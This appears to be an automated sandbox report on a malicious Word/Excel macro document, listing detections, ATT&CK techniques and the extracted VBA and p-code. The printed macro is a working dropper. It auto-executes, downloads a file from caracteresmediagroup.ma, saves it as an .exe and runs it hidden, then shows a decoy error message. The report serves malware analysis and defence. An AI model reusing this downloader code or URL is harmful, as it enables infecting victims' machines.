Verdict: MALICIOUS (Risk Score 374)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1566.001 Spearphishing Attachment
The sample contains VBA macros that attempt to download and execute a second-stage payload from the URL http://caracteresmediagroup.ma/wp-content/themes//twentyten//mmsclaro.php. The document body explicitly instructs the user to enable macros, presenting a social engineering lure to bypass security measures. The VBA script constructs the URL and filename for the payload at run time, indicating downloader functionality.
Heuristics (13)

- ClamAV: Doc.Downloader.Generic-6698421-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- VBA macros detected [medium, OLE_VBA_MACROS, 9 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched line in script: Shell FSP, vbHide
- VBA downloads and writes a file to disk [critical, OLE_VBA_HTTP_DROP_EXEC]: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: OIREQER.Write ASDEKR.responseBody
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script: Set ASDEKR = CreateObject(sakjdkjsadkjsad & akdjkasjdkaoaso & "." & asjdkasjdhkiass & akjsdhaksuhdkjh)
- Payload URL assembled from a Chr()/Asc() string expression (1 URL) [high, OLE_VBA_EXPR_DROPPER_URL]: A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: Sub AutoOpen()
- Workbook_Open macro [low, OLE_VBA_WBOPEN]: Workbook_Open macro. Matched line in script: Sub Workbook_Open()
- Auto_Open macro [low, OLE_VBA_AUTO]: Auto_Open macro. Matched line in script: Auto_Open
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]: Environ() call (env variable access). Matched line in script: FSP = Environ(SABKERPE) & "\" & EASREFG
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://caracteresmediagroup.ma/wp-content/themes//twentyten//mmsclaro.php (Referenced by macro)
  - http://ns.adobe.com/xap/1.0/ (Referenced by macro)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (Referenced by macro)
  - http://purl.org/dc/elements/1.1/ (Referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (Referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7562 bytes | 6bc4eb7be284ba38a6f2772ef74c4dccfe1fac919caef6245e1249ca39e72a5b |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Workbook_Open()
Auto_Open
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Auto_Open()
h
End Sub
Sub h()
Dim adsdasaadsadsads As String
Dim aiusodhiausdghia As String
Dim aiusdhy9uehoaijs As String
Dim ads3jsdfiujhaoia As String
aiusodhiausdghia = "caracteresmediagroup.ma/wp-content/themes/"
aiusdhy9uehoaijs = "/twentyten/"
ads3jsdfiujhaoia = "/mmsclaro"
Dim laksjdsaasiodjds As String
laksjdsaasiodjds = adsdasaadsadsads + aiusodhiausdghia + aiusdhy9uehoaijs + ads3jsdfiujhaoia
Aasdsa = DERALLKE("ht" & "tp" & "://" & aiusodhiausdghia & aiusdhy9uehoaijs & ads3jsdfiujhaoia & "." & "php", "23324231432423423" & "." & "exe", "use" & "rp" & "ro" & "file", True, True)
MessageBoxExample
End Sub
Sub MessageBoxExample()
MsgBox "Este documento no es compatible con este equipo." & "Por favor intente desde otro equipo.", vbCritical, "Equipo no compatible"
End Sub
Attribute VB_Name = "Module1"
Function DERALLKE(ByVal UKERLE As String, ByVal EASREFG As String, Optional SABKERPE As String = "TMP", Optional RAD As Boolean = True, Optional RHD As Boolean = False)
On Error Resume Next
Err.Clear
Dim sakjdkjsadkjsad As String
Dim akdjkasjdkaoaso As String
Dim asjdkasjdhkiass As String
Dim akjsdhaksuhdkjh As String
akjsdhaksuhdkjh = "TTP"
asjdkasjdhkiass = "XMLH"
sakjdkjsadkjsad = "Micro"
akdjkasjdkaoaso = "soft"
Set ASDEKR = CreateObject(sakjdkjsadkjsad & akdjkasjdkaoaso & "." & asjdkasjdhkiass & akjsdhaksuhdkjh)
Dim dooaisjdoaisjo As String
Dim asdhaosidoijoa As String
dooaisjdoaisjo = "ADODB"
asdhaosidoijoa = "Stream"
Set OIREQER = CreateObject(dooaisjdoaisjo & "." & asdhaosidoijoa)
ASDEKR.Open "G" & "E" & "T", UKERLE, False
ASDEKR.send
ASDEKR.getAllResponseHeaders
FSP = Environ(SABKERPE) & "\" & EASREFG
OIREQER.Open
OIREQER.Type = 1
OIREQER.Write ASDEKR.responseBody
OIREQER.SaveToFile FSP, 2
If Err Then
DNWF = False
Else
If RAD = True Then
If RHD = True Then
Shell FSP, vbHide
Else
Shell FSP, vbNormalFocus
End If
End If
DWNF = True
End If
End Function
' Processing file: /tmp/qstore_mzryy9ml
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5093 bytes
' Line #0:
' FuncDefn (Sub File())
' Line #1:
' ArgsCall DERALLKE 0x0000
' Line #2:
' EndSub
' Line #3:
' FuncDefn (Sub MessageBoxExample())
' Line #4:
' ArgsCall DERALLKE 0x0000
' Line #5:
' EndSub
' Line #6:
' FuncDefn (Sub DERALLKE())
' Line #7:
' ArgsCall bool 0x0000
' Line #8:
' EndSub
' Line #9:
' FuncDefn (Sub bool())
' Line #10:
' Dim
' VarDefn jsdfiujhaoia (As String)
' Line #11:
' Dim
' VarDefn laksjdsaasiodjds (As String)
' Line #12:
' Dim
' VarDefn _B_var_laksjdsaasiodjds (As String)
' Line #13:
' Dim
' VarDefn _B_var_aiusodhiausdghia (As String)
' Line #14:
' LitStr 0x002A "caracteresmediagroup.ma/wp-content/themes/"
' St laksjdsaasiodjds
' Line #15:
' LitStr 0x000B "/twentyten/"
' St _B_var_laksjdsaasiodjds
' Line #16:
' LitStr 0x0009 "/mmsclaro"
' St _B_var_aiusodhiausdghia
' Line #17:
' Dim
' VarDefn _B_var_aiusdhy9uehoaijs (As String)
' Line #18:
' Ld jsdfiujhaoia
' Ld laksjdsaasiodjds
' Add
' Ld _B_var_laksjdsaasiodjds
' Add
' Ld _B_var_aiusodhiausdghia
' Add
' St _B_var_aiusdhy9uehoaijs
' Line #19:
' LitStr 0x0002 "ht"
' LitStr 0x0002 "tp"
' Concat
' LitStr 0x0003 "://"
' Concat
' Ld laksjdsaasiodjds
' Concat
' Ld _B_var_laksjdsaasiodjds
' Concat
' Ld _B_var_aiusodhiausdghia
' Concat
' LitStr 0x0001 "."
' Concat
' LitStr 0x0003 "php"
' Concat
' LitStr 0x0011 "23324231432423423"
' LitStr 0x0001 "."
' Concat
' LitStr 0x0003 "exe"
' Concat
' LitStr 0x0003 "use"
' LitStr 0x0002 "rp"
' Concat
' LitStr 0x0002 "ro"
' Concat
' LitStr 0x0004 "file"
' Concat
' LitVarSpecial (True)
' LitVarSpecial (True)
' ArgsLd iRet 0x0005
' St akdjkasjdkaoaso
' Line #20:
' ArgsCall iRet2 0x0000
' Line #21:
' EndSub
' Line #22:
' FuncDefn (Sub iRet2())
' Line #23:
' Line #24:
' LitStr 0x0030 "Este documento no es compatible con este equipo."
' LitStr 0x0024 "Por favor intente desde otro equipo."
' Concat
' Ld Application
' LitStr 0x0014 "Equipo no compatible"
' ArgsCall strPrompt2 0x0003
' Line #25:
' EndSub
' Line #26:
' Macros/VBA/Module1 - 5412 bytes
' Line #0:
' ConstFuncExpr
' LitVarSpecial (False)
' LitVarSpecial (True)
' LitStr 0x0003 "TMP"
' FuncDefn (Function iRet(ByVal RunHide As String, ByVal Err As String, Optional Clear As String, Optional FSP As Boolean, Optional _B_var_FSP As Boolean))
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld OIREQER
' ArgsMemCall send 0x0000
' Line #3:
' Dim
' VarDefn akjsdhaksuhdkjh (As String)
' Line #4:
' Dim
' VarDefn dooaisjdoaisjo (As String)
' Line #5:
' Dim
' VarDefn id_02D0 (As String)
' Line #6:
' Dim
' VarDefn id_02D2 (As String)
' Line #7:
' LitStr 0x0003 "TTP"
' St id_02D2
' Line #8:
' LitStr 0x0004 "XMLH"
' St id_02D0
' Line #9:
' LitStr 0x0005 "Micro"
' St akjsdhaksuhdkjh
' Line #10:
' LitStr 0x0004 "soft"
' St dooaisjdoaisjo
' Line #11:
' SetStmt
' Ld akjsdhaksuhdkjh
' Ld dooaisjdoaisjo
' Concat
' LitStr 0x0001 "."
' Concat
' Ld id_02D0
' Concat
' Ld id_02D2
' Concat
' ArgsLd FullSavePath 0x0001
' Set getAllResponseHeaders
' Line #12:
' Dim
' VarDefn id_02D4 (As String)
' Line #13:
' Dim
' VarDefn id_02D6 (As String)
' Line #14:
' LitStr 0x0005 "ADODB"
' St id_02D4
' Line #15:
' LitStr 0x0006 "Stream"
' St id_02D6
' Line #16:
' SetStmt
' Ld id_02D4
' LitStr 0x0001 "."
' Concat
' Ld id_02D6
' Concat
' ArgsLd FullSavePath 0x0001
' Set Environ
' Line #17:
' LitStr 0x0001 "G"
' LitStr 0x0001 "E"
' Concat
' LitStr 0x0001 "T"
' Concat
' Ld RunHide
' LitVarSpecial (False)
' Ld getAllResponseHeaders
' ArgsMemCall Open 0x0003
' Line #18:
' Ld getAllResponseHeaders
' ArgsMemCall responseBody 0x0000
' Line #19:
' Ld getAllResponseHeaders
' ArgsMemCall SaveToFile 0x0000
' Line #20:
' Ld Clear
' ArgsLd Shell 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld Err
' Concat
' St link
' Line #21:
' Ld Environ
' ArgsMemCall Open 0x0000
' Line #22:
' LitDI2 0x0001
' Ld Environ
' MemSt Type
' Line #23:
' Ld getAllResponseHeaders
' MemLd vbHide
' Ld Environ
' ArgsMemCall Xor 0x0001
' Line #24:
' Ld link
' LitDI2 0x0002
' Ld Environ
' ArgsMemCall vbNormalFocus 0x0002
' Line #25:
' Ld OIREQER
' IfBlock
' Line #26:
' LitVarSpecial (False)
' St _B_var_DNWF
' Line #27:
' ElseBlock
' Line #28:
' Ld FSP
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #29:
' Ld _B_var_FSP
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #30:
' Ld link
' Ld _B_var_OIREQER
' ArgsCall _B_var_ASDEKR 0x0002
' Line #31:
' ElseBlock
' Line #32:
' Ld link
' Ld _B_var_Environ
' ArgsCall _B_var_ASDEKR 0x0002
' Line #33:
' EndIfBlock
' Line #34:
' EndIfBlock
' Line #35:
' LitVarSpecial (True)
' St _B_var_DWNF
' Line #36:
' EndIfBlock
' Line #37:
' EndFunc
' Line #38:
' Line #39: